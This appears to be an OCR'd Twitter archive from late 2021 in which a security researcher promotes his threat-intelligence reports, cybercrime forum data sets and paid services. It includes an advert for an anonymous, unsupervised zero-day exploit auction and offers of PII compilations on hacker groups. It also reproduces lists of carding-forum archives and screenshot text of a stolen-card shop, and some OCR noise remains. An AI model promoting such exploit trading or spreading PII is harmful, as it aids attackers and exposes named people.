#cybercrime #malware #CyberSecurity #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/joYJn64pul 
1 - Friday 


11:50 


God bless. #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/F3cWRANhRm 
12:13 


Happy Friday! #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/eAcRC1EGnu 
12:24 


21 ¥*1 


Cheers! #security #cybercrime #malware #CyberSecurity #Threatintel 
#ThreatHunting https://t.co/xbvMtjWK3I 
13:32 
#NowPlaying - https://t.co/tJSBZLmXou 


2 - Saturday 


05:18 
Re-defining the very basics of what shapes us on a daily basis - high quality and 
constructive and never-published before threat intelligence and OSINT analysis 
cybercrime research. Check this out - https://t.co/DjegobOF3Wx 
https://t.co/H3al9OIGvY 
05:19 


Check this out! - https://t.co/DjegoOF3Wx #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #ThreatHunting #threatintelligence 
https://t.co/zpbdzbNs3Y 
14:04 


Friends and colleagues. This is Dancho. Do you invest in cyber security projects? Do 
you want to work with me? I’m in an urgent need of an investor for a project with a 
total requested amount in $5,000 in BitCoin. Drop me a line at 
dancho.danchev@hush.com https://t.co/sDaGt3iVDW 


Zero Day Exploit Auction 


We're a partnership between the world’s leading expert in the field of cybercrime research OSINT and threat intelligence gathering 
Dancho Danchev and one of the Web's most popular destinations for hackers and security experts since 1994 the infamous 
Astalavista.box.sk where we aim to set the foundations for a ground-breaking and fully working Zero Day Exploits auction business 
model where users researchers vendors and companies can buy and sell exploits in an anonymous and fully automated without any 
sort of supervision fashion where the ultimate goal would be to improve everyone's security and provide the necessary publicity and 
financial incentive for researchers and users to submit buy and sell their exploits online 


Current Project Statistics: 
Exploits: 36,640 | Researchers: 44,134 


Multiple Local Versions for This Project Include: 
Russia | Germany | Turkey | France | Italy | Spain | Romania | Poland | Argentina | Japan | China | 


Zero Day Exploit and 
Vulnerability Auction 
Please contact us via mail ( 

or XMPP/Jabber/OMEMO ( 


) with your exploit and vulnerability submissions! 
PGP Key: 


https://astalavista.box.sk/Dancho_Danchev.asc 


15:30 


https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#Threatintelligence #ThreatHunting https://t.co/DWc7JPuTd7 
3 - Sunday 


14:50 


Here’s my latest compilation of @ProtonMail and @TutanotaTeam themed 
ransomware email accounts. Let’s make it happen! - https://t.co/yOdOTLxYa8 ; 
https://t.co/8IIdBA940f #security #cybercrime #malware #ThreatHunting 
#threatintelligence #threatintel https://t.co/dD4GDTahla 
4 - Monday 
00:04 
RT @TutanotaTeam: @dancho_danchev @ProtonMail Thanks for reporting, we'll look 
into this! 
00:05 


Folks. Check out my new Dark Web Onion address which is - https://t.co/65pZhsbELh 
#security #cybercrime #malware #CyberSecurity #threatintelligence 
https://t.co/vXhk7R2tKK 
22:57 
https://t.co/ixAOmiAO0O0d 


6 - Wednesday 


13:21 


A Compilation of Currently Active and Related Scams Scammer Email Addresses - An 
OSINT Analysis - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:21 


A Compilation of Currently Active Cyber Jihad Themed Personal Email Addresses - An 
OSINT Analysis - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:22 


A Compilation of Currently Active Full Offline Copies of Cybercrime-Friendly Forum 
Communities - Direct Technical Collection Download -[RAR] - https://t.co/HBrH9cBDib 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:22 


A Compilation of Personally Identifiable Information on Various Iran-based Hacker 
Groups and Lone Hacker Teams - Direct Technical Collection Download - [RAR] - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack #threatintel 


13:22 


A Koobface Botnet Themed Infographic Courtesy of my Keynote at CyberCamp - A 
Photo - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:22 


Advanced Bulletproof Malicious Infrastructure Investigation - WhoisXML API Analysis - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:23 
Advanced Mapping and Reconnaissance of Botnet Command and Control 
Infrastructure using Hostinger’s Legitimate Infrastructure - WhoisXML API Analysis - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:23 


Advanced Mapping and Reconnaissance of the Emotet Botnet - WhoisXML API 
Analysis - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 
13:23 


Assessing The Computer Network Operation (CNO) Capabilities of the Islamic 
Republic of Iran - Free Research Report - https://t.co/HBrH9ck2qD #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:24 


Astalavista Security Newsletter - 2003-2006 - Full Offline Reading Copy - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:24 


Compilations of Personally Identifiable Information Including XMPP/Jabber and 
Personal Emails Belonging to Cybercriminals and Malicious Threat Actors 
Internationally - An OSINT Analysis - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack 
Cyber Intelligence - Personal Memoir - Dancho Danchev - - Download Free Copy 
Today! - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:25 


Cybercriminals Impersonate Legitimate Security Researcher Launch a Typosquatting 
C&C Server Campaign - WhoisXML API Analysis - https://t.co/HBrH9cBDib 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:25 


Dancho Danchev - Cyber Intelligence - Personal Memoir - Direct Download Copy 
Available - https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:25 


Dancho Danchev’s “A Qualitative and Technical Collection OSINT-Enriched Analysis of 
the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
Security Team” Report - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 


13:25 


Dancho Danchev’s “Assessing The Computer Network Operation (CNO) Capabilities of 
the Islamic Republic of Iran” Report - [PDF] - https://t.co/HBrH9cBDib #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev’s “Astalavista Security Group - Investment Proposal” Presentation - 
A Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 
13:26 


Dancho Danchev’s “Building and Implementing a Successful Information Security 
Policy” White Paper - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev’s “Cyber Jihad vs Cyberterrorism - Separating Hype from Reality” 
Presentation - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:26 


Dancho Danchev's “Cyber Jihad vs Cyberterrorism - Separating Hype from Reality - A 
Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - 
A Photos Compilation - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - 
[PDF] - https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” 
Presentation - A Photos Compilation - https://t.co/HBrH9ck2qD #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:27 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” 
Presentation - [PDF] - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


13:28 


Dancho Danchev’s “Intell on the Criminal Underground - Who's Who in Cybercrime 
for ” Presentation - [PDF] - https://t.co/HBrH9cBDib #security #cybercrime #malware 
#CyberAttack #threatintel #threatintelligence 


21 
13:28 
Dancho Danchev’s “Intell on the Criminal Underground - Who's Who in Cybercrime 
for ?” - A Photos Compilation - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 
13:28 


Dancho Danchev’s - Cybercrime Forum Data Set - Free Direct Technical Collection 
Download Available - 19 GB - [RAR] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:29 

Dancho Danchev’s Blog - Full Offline Copy Available - [PDF] - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 

13:29 


Dancho Danchev’s Comeback Livestream Today - Join me on Facebook Live! - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


23 
13:29 


Dancho Danchev’s CV - Direct Download Copy Available - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


<2 
13:29 
Dancho Danchev’s Cybercrime Forum Data Set for - Upcoming Direct Technical 
Collection Download Available - https://t.co/HBrH9cBDib #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 
13:30 


Dancho Danchev’s Primary Contact Points for this Project - 
Email/XMPP/Jabber/OMEMO and PGP Key Accounts - https://t.co/HBrH9ck2qD 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 


13:30 


Dancho Danchev’s Privacy and Security Research Compilation - Medium Account 
Research Compilation - [PDF] - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #threatintel #threatintelligence 


13:30 


Dancho Danchev’s Private Party Videos - Direct Video Download Available - 
https://t.co/HBrH9cBDib #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:30 


Dancho Danchev’s Private Party Videos - Part Three - Direct Video Download 
Available - https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 
21 
13:30 
Dancho Danchev’s Private Party Videos - Part Two - Direct Video Download Available - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


13:31 


Dancho Danchev’s Random Conference and Event Photos - A Compilation - 
https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#threatintel #threatintelligence 


8 - Friday 


09:44 


Introducing Dancho Danchev’s Ultimate "Cybercrime Research and Cybercrime 
Fighting Toolkit" USB Stick - Order a copy today! - https://t.co/fnswrm8KWP #security 
#cybercrime #malware #CyberSecurity #Threatintel #Threatintelligence 
#ThreatHunting https://t.co/fRtbQO002g2 
Dancho_Danchev_Blog_E-Book_Archive_2021 
Dancho_Danchev_Cybercrime_Research_Presentations_2021 
Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 
Dancho_Danchev_Iran_Hackers_Personally_Identifiable_Information_Compilation_2021 
Dancho_Danchev_Iran_White_Paper_2021 
Dancho_Danchev_Iran_White_Paper_Part_Two_2021 
Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 
Dancho_Danchev_Malware_Trends_White_Paper_2021 
Dancho_Danchev_Medium_Research_Compilation_2021 
Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 
Dancho_Danchev_Personal_Photos_Compilation_2021 
Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 
Dancho_Danchev_Security_Policy_White_Paper_2021 
Dancho_Danchev_Twitter_Account_Archive_2021 
Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 
Dancho_Danchev_Webroot_Research_Compilation_2021 
Dancho_Danchev_ZDNet_Research_Compilation_2021 
WhoisXML_API_Research_Articles_2021 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#Threatintel #ThreatHunting #threatintelligence https://t.co/c61KAVHgrU 
9 - Saturday 


11:18 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence https://t.co/OuHfaolf5) 
16:50 


Grab the Torrent! - https://t.co/tHKF82FHI3 Visit the infamous 
https://t.co/fnswrm8KWP and order a copy! Shipped and delivered every Friday! It 
would greatly help me fuel growth into my research and actually help me pay the 
bills. Stay tuned! https://t.co/5DmTct]7SO 


10 - Sunday 


05:53 


Grab the Torrent! https://t.co/tHKF82FHI3 Visit https://t.co/fnswrm8KWP and order a 
USB Stick! Regards. Dancho #security #cybercrime #malware #Threatintel 
#Threatintelligence #ThreatHunting #CyberSecurity #torrent 
https://t.co/5kWE20yKOW 
14:21 
Next week I'll be participating in a Russian documentary on hackers. Stay tuned! 
11 - Monday 


15:25 


Grab the Torrent! - https://t.co/tHKF82FHI3 Regards. Dancho #security #cybercrime 
#malware #CyberSecurity #ThreatHunting https://t.co/pFebszoS9W 
12 - Tuesday 


03:32 


Grab the Torrent! https://t.co/qiAltYb2I1 Regards. Dancho #security #cybercrime 
#malware #CyberSecurity #Threatintel #Threatintelligence https://t.co/911g2tBPSG 
14 - Thursday


06:28 
Check out my latest paper for @whoisxmlapi - https://t.co/FHbh3cbt5d #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/OgjOVn921i 
To Domains and IP Addresses (Historical Reverse WHOIS Search) [WhoisXML]


To Domains and IP Addresses (Reverse WHOIS Search) [WhoisXML] 
To Historical WHOIS Records [WhoisXML]


To WHOIS Records [WhoisXML] 
06:29
Here’s my second white paper for @whoisxmlapi - https://t.co/bKiZkmDMEq 
#security #cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/2DZLKSfF4n 
Domain (83)


06:30 


Here’s my third white paper for @whoisxmlapi - https://t.co/2MPVIOmKnz #security 
#cybercrime #malware #CyberAttack #threatintel #threatintelligence 
https://t.co/OejB7spFID 
07:03


Grab the Torrent! Cybercrime Forum Data Set for 2021 consisting of full offline copies 
of 111 cybercrime-friendly forum communities for OSINT enrichment and processing 
including all of my publicly accessible research - https://t.co/qiAltYsDcz 
https://t.co/oEY6z8Xs91 


07:15 


https://t.co/7Pzr7DCnLs #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 


22 *1 
07:16 


https://t.co/KdTkKQMkWm1 #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 
07:17


https://t.co/sZXGMvSSgK #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 


21 *1 
07:17 
https://t.co/tg9vFXyqYU #security #cybercrime #malware #CyberSecurity 
#Threatintel #Threatintelligence 
21 *1 
07:42


Check out my Dark Web Onion - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberSecurity #ThreatIntel #ThreatHunting #Threatintelligence


07:46 
07:47


https://t.co/bvqIPWxu5E 
https://t.co/m65nyeOh8m


https://t.co/2L4ifQOsHr 


https://t.co/r5ncacvDMG 


https://t.co/LRU8dgBQIk 


https://t.co/8aifeEqC44 


https://t.co/P7ZRSN3KWc 


https://t.co/zfj9PIPIXh 
07:47
https://t.co/K4dEMgUE7G 


07:52 


Grab a copy of my personal memoir - 2021 - https://t.co/qLxz4GuRip [PDF] #security 
#cybercrime #malware #CyberSecurity #Threatintel #ThreatHunting 
#Threatintelligence https://t.co/aLMhtJjU7f 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


09:56 


Who remembers my work 2008-2013 and who remembers my work on the Koobface 
botnet? I need a co-editor and co-writer who can contribute with personal "from the
trenches" perspectives and comments on my research including their research 
throughout 2008-2013? https://t.co/DOTYQB7EWH 
09:58


Did you enjoy the first edition of my "Cyber Intelligence" memoir? 
https://t.co/qLxz4GuRip [PDF] I need a co-editor and co-writer who remembers my
research and story including the Koobface botnet 2008-2013? Drop me a line
dancho.danchev@hush.com https://t.co/IYOMAQhgSZ 
18 - Monday


13:09 


https://t.co/cQq40tVcwD #security #cybercrime #malware #CyberSecurity 
#DarkWeb #onions #onionlinks https://t.co/niVK6OxLqY 
20 - Wednesday


04:10 


https://t.co/HKgAoJAGeH #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintelligence #threatintel 


22 - Friday 


00:09 


Check this out! Google’s Firebase under fire using a massive phishing domains farm. 
Multiple brands affected. Check out the analysis on my Dark Web Onion - 
https://t.co/67CN61MI3F #security #cybercrime #malware #threatintelligence 
https://t.co/sSSWGWpPnF 
00:35


Who wants to join me in an Ask Me Anything (AMA) session using
https://t.co/ffE3etM11H? #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #threatintelligence 


22 
19:21 


https://t.co/oYUefKdlCe CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #Threatintelligence 


2l 
19:22 


https://t.co/PPxjy2CoAK CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #Threatintelligence 
19:22


https://t.co/JneXEF6qk6 CC: @whoisxmlapi #security #cybercrime #malware 
#CyberSecurity #Threatintel #ThreatIntelligence 
28 - Thursday


03:47 


Folks. Apologies for the downtime. Check out my official Dark Web Onion - 
Intelligence Community 2.0 - https://t.co/HBrH9ck2qD #security #cybercrime 
#malware #CyberAttack #CybersecurityAwarenessMonth #ThreatHunting 
#Threatintel https://t.co/LcSKeNMfma 
21:19


https://t.co/AGHOL5bI7L #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #threatintel #ThreatHunting #threatintelligence 
#threatreport CC: @whoisxmlapi 


29 - Friday 


01:51 


https://t.co/821U8c53KI #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence #threatreport 
https://t.co/qEqEpizS5p 
01:52


https://t.co/d6Uso70AUT #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence #threatreport 
https://t.co/ILnZctvkhb 
06:55


https://t.co/wsUKpQAAw1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CybersecurityAwarenessMonth #Threatintel 
https://t.co/mVDLOZOnJN 
https://t.co/qywxc8dgJK #security #cybercrime #malware #CyberSecurity
#CyberAttack #CybersecurityAwarenessMonth #Threatintel https://t.co/ZYI1rjSzym 
06:58


https://t.co/Ep8dlEamXZ #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CybersecurityAwarenessMonth #Threatintel https://t.co/322kuZJlqO 




30 - Saturday 


08:06 


Folks. Check this out - https://t.co/ByuFMPAifH this is the official Clearnet URL for my
official Dark Web Onion - https://t.co/cQq40tVcwD #security #cybercrime #malware
#CyberSecurity #CybersecurityAwarenessMonth #ThreatHunting #threatintelligence
https://t.co/AToWBF5aw8
US Intelligence Community 2.0


09:21 


https://t.co/rLaighdAho #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #ThreatHunting #threatintelligence #threatintel 
https://t.co/gWXj8ZcUVG 
31 - Sunday


00:33 


https://t.co/UvVAt5gK9BA #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #ThreatHunting #threatintel https://t.co/s1tStaHOT2 


November 


2 - Tuesday 


02:09 


Hi everyone. This is Dancho (https://t.co/JTcqOaYgET) and I wanted to take the time
and effort to elaborate more on my latest cybercrime research. Remember Darkode? 
Check this out! - https://t.co/rLaighdAho #security #cybercrime #malware 
#Threatintelligence https://t.co/qkauLpgqirD 
3 - Wednesday


01:18 


Subscribe here! - https://t.co/gej8f4CWpN #security #cybercrime #malware 
#CyberAttack #CybersecurityAwarenessMonth #threatintelligence 
https://t.co/KSodsSdZyp 
PRESENTS


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog! 


16:37 


https://t.co/5ARwhCtdCN #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #Threatintel #ThreatHunting 


8 - Monday 


04:28 


My latest project - https://t.co/WIBGTU5ryT BitCoin accepted for 365 days 
membership where I can guarantee approximately 12 to 20 unique
cybercrime/OSINT/Threat Intelligence type of actionable intelligence articles on a
daily basis! Support me today! https://t.co/nqLONe5FgN 


06:12 


https://t.co/gej8f4CWpN #security #cybercime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CybersecurityNews #Threatintel 
#threatintelligence https://t.co/EBMF4am0LH 
DANCHO DANCHEV
SPEAKS! 


The World's Most Popular and Often Cited Security Blog 


20:31 


My new RSS feed - https://t.co/Vf—l8P30qdo Support me today! #security #cybercrime 
#malware #CyberSecurity #CyberAttack #CybersecurityAwarenessMonth 
#Threatintel #threathunting #threatintelligence https://t.co/GIWWLGOoG6HI 
9 - Tuesday


07:50 


RT @dsph_ official: Hola #damnconians , We introduce you to the speakers of 
DamnCon 2021 with their topics. Our speaker Mr. Dancho Danchev (... 


07:56 


Stay tuned for my participation! Register here - https://t.co/LxYXgxLOZo Cheers! 
Dancho #security #cybercrime #malware #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/V62IDWG6py 
Dancho Danchev


Establishing Methodology for
Threat Intelligence


12:55 


Check this out! #security #cybercrime #malware #CyberAttack #CyberSecurity 
#ThreatHunting #Threatintel #Threatintelligence https://t.co/oUfHGmakKQs 


Disruptive
Or
Offensive Warfare


10 - Wednesday 


04:29 


Check this out! - https://t.co/GRMcplpzAE #security #cybercrime #malware 
#CyberAttack #CyberSecurity #ThreatHunting #Threatintelligence #threatintel 
https://t.co/TVGWjpmiTO 
11 - Thursday


23:07 


Folks. Do you want a decent and convenient way to improve your situational 
awareness in cybercrime research? Grab a copy of my Cybercrime Forum Data Set 
for 2021 which is 36GB - https://t.co/mZ4FeTnSMp #security #cybercrime #malware 
#ThreatHunting https://t.co/aYqoYl4WkG 


Distribution of keywords (Frequency) 


23:08 


My Cybercrime Forum Data set for 2021 consists of full offline copies of 126 publicly
accessible cybercrime-friendly forum communities for Technical Collection 
analysis/cybercrime research/OSINT enrichment and threat intelligence analysis. 
Grab a copy today! 


*1 


13 - Saturday 


03:32 


https://t.co/emFBYU8Pld #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #ThreatIntel #ThreatHunting #threatdetection 
#threatintelligence #threatreport https://t.co/e9JdD8z68U 


[Chart: Distribution of keywords (Frequency)]


17 - Wednesday 


23:50 


New layout - https://t.co/OmUajr8DT8 inquire at disruptive.individuals@gmail.com 
#security #cybercrime #malware #CyberAttack #CyberSec #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/qwb2I2Gleh 
Disruptive Individuals — Boutique Cyber Intelligence Services


“We make Cyber Intelligence impact where no one has been before!”


19 - Friday 


06:33 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #cybersecuritytips #threatintelligence 
https://t.co/y4KMwXm6mw 
06:34


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #cybersecuritytips #threatintelligence 
https://t.co/ABNpMNqij4 


Disruptive Individuals — Boutique Cyber Intelligence Services


“We make Cyber Intelligence impact where no one has been before!”


10:19 


Anyone interested in hiring me to do contractor work? - https://t.co/OmUajr8DT8
#security #cybercrime #malware #CyberAttack #ThreatHunting #ThreatIntel 
#threatintelligence https://t.co/l4I3fWnVG5 
Disruptive Individuals — Boutique Cyber Intelligence Services


“We make Cyber Intelligence impact where no one has been before!”


20 - Saturday 


00:30 


https://t.co/WIBGTU5ryT https://t.co/vRs4ShzoGI 


verified.bz
Webmasters.ru.rar
Whitehat.vn.rar
WWH-Club.rar
www.forohack.com.rar
WWW.Opensc.ws.rar
www.ryan1918.com.rar
Xakep.bg.rar
xaker.name.rar
xaknet.org.rar
Zismo.rar
00:31
https://t.co/WIBGTU5ryT https://t.co/nMSZy3unVv 
ica.su.rar
iFud.rar
iHonker.rar
imhatimi.org.rar
iransec.net.rar
it-24h.com.rar
itsobr.com.rar
LinkFeed.rar
Linuxac.org.rar
Master-X.rar
MaulTalk.rar


00:31 
https://t.co/WIBGTU5ryT https://t.co/53k8BZ4KHI 
BPCForum.rar
carderplanet.rar
carders.se.rar
cardingmafia.ws.rar
cardingsite.cc.rar
Cardvilla.rar
c-cracking.org.rar
Chf.rar
CNHonker.rar
CNSec.rar
Cracked.to.rar


22 - Monday 
00:49 
Happy birthday to me! Regards. Dancho https://t.co/jOnDwW5j2q 
01:39


24 - Wednesday 


08:08 


@securityaffairs Thank you! Regards. Dancho 


https://t.co/dyYJacYtj5 https://t.co/cdcWEPecnm 




28 - Sunday 


09:05 


https://t.co/99acM24Alq #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatHunting #Threatintelligence #threatintel 
29 - Monday


10:30 
https://t.co/Bqbi2IDib5 #security #cybercrime #malware #CyberSecurity 
30 - Tuesday


06:36 


Who follows me on Twitter? Reply with an introduction. Thanks! #security 
#cybercrime #malware #threatintel 


a2] 


06:50 


@vxunderground Bad stuff. Believe it or not that’s not true. The true bad guys never 
really care or sometimes know what you’re saying or doing unless of course you 
come up with a pretty bad way to undermine their online campaigns. That’s the true 
way of dealing with them. 


07:16 


@bambenek @threatpost That’s not necessarily true. Although the bad guys aim to 
bypass the Google Play anti-malware restriction I’ve seen underground market 
propositions where they trade with and seek to buy legitimate Google Play publisher 
accounts to propagate their campaign. 


12:45 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence 
https://t.co/oc3AQHYCBB 


21 %1 


13:17 


Xmas came early. And so is my birthday. Check this out! God bless and enjoy the 
holidays! Cheers! Dancho #security #cybercrime #malware #cybersecurity 
#threatintel #threatintelligence https://t.co/L9c89MwnHr 
December


2 - Thursday 


06:57 


Making headlines on a daily basis. Since the early days of humankind. 
https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#CybersecurityNews #ThreatHunting https://t.co/OqLFg7ETV3 
07:12
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/gmUuHQevpu 
GET READY TO EXPOSE IRAN

WHO'S WHO ON IRAN'S CYBER WARFARE SCENE?
WHO'S BUYING THEM BOOKS?
HOW DO THEY OWN AND COMPROMISE?
WHERE DO THEY GO TO SCHOOL?

ANALYSIS BY DANCHO DANCHEV - REPORT PRICE - $500


07:14 
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/REJLL69GXQ 
“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND
NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND
OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR
BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010.” - DANCHO
DANCHEV


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


07:26 
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/eccj7LsqoW 
11:05


Setting them straight. https://t.co/qLxz4GuRip #security #cybercrime #malware 
#ThreatHunting #Threatintel https://t.co/g9dWdlwy6a 
3 - Friday


05:35 
Cyber
Intelligence


The Definite Cybercrime and Web 2.0 Memoir
Courtesy of Dancho Danchev
The RBN, The Koobface Botnet, The Rock Phish Gang,
Spam Phishing and Malware Campaigns Including Botnet and
Money Mule Recruitment Scams Traced Down to Their
Source Including Various Underground Market Propositions
Exposed


https://ddanchev.blogspot.com


Dancho Danchev


https://t.co/jdLtDXuOdW https://t.co/iSS9NWk28n 


REMOTE ACCESS TROJAN
WORM: E-MAIL PROPAGATION
WORM: IRC PROPAGATION
KEYSTROKE LOGGER
FTP SERVER
PASSWORD GRABBER
DESTRUCTIVE
TARGETS SPECIFIC PROGRAMS
STARTS EVERYTIME WINDOWS STARTS


Ht E'Y_LOCAL_MACHIP WARE \Mictosolt ows \CurrentVersion\RunSen


The functions of this trojan are


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. - Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg)


08:50 


Folks? Who remembers the early days of @MaltegoHQ I do! Check out this
screenshot part of a Russia vs Georgia DDoS attack investigation a decade ago -
https://t.co/oMTRJCRdMJ guess what? "I Know Who DDoS-ed Georgia and
https://t.co/OPLSbzSK7Q Last Summer". https://t.co/dy2lyRY61T
08:52
https://t.co/JTcqOaYgET https://t.co/qTmpep9d0S 


08:52 


https://t.co/JTcqOaYgET https://t.co/AyKKvTXues 
08:52


https://t.co/JTcqOaYgET https://t.co/KGTsniCXkC 
08:52
08:56


https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatdetection https://t.co/YESXvYJ2iK 


bmber 7, 1982 


09:13 


https://t.co/qs5iTxLwmkK1 #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #Threatintelligence #threatdetection 
https://t.co/H48MgFI3dQ 
4 - Saturday


06:06 
https://t.co/JTcqOaYgET https://t.co/9SejCtrawr 
ugmarketcc Shop Orders Cart (0) Gift code Affiliate
Shopping Creditcard
HOT Cards package!!!
Package 50 cards UNCHECK Package 100 cards UNCHECK Package 1000 cards UNCHECK
Combo 50 creditcards Combo 100 creditcards Combo 1000 creditcards
$9/card for 50 card(s) $9/card for 100 card(s) $9/card for 1000 card(s)
Normal price: $456 Normal price: $968 Normal price: $9868
» BUY NOW « » BUY NOW « » BUY NOW «
Package 50 cards live 100% CHECKED Package 100 cards live 100% CHECKED Package 1000 cards live 100% CHECKED
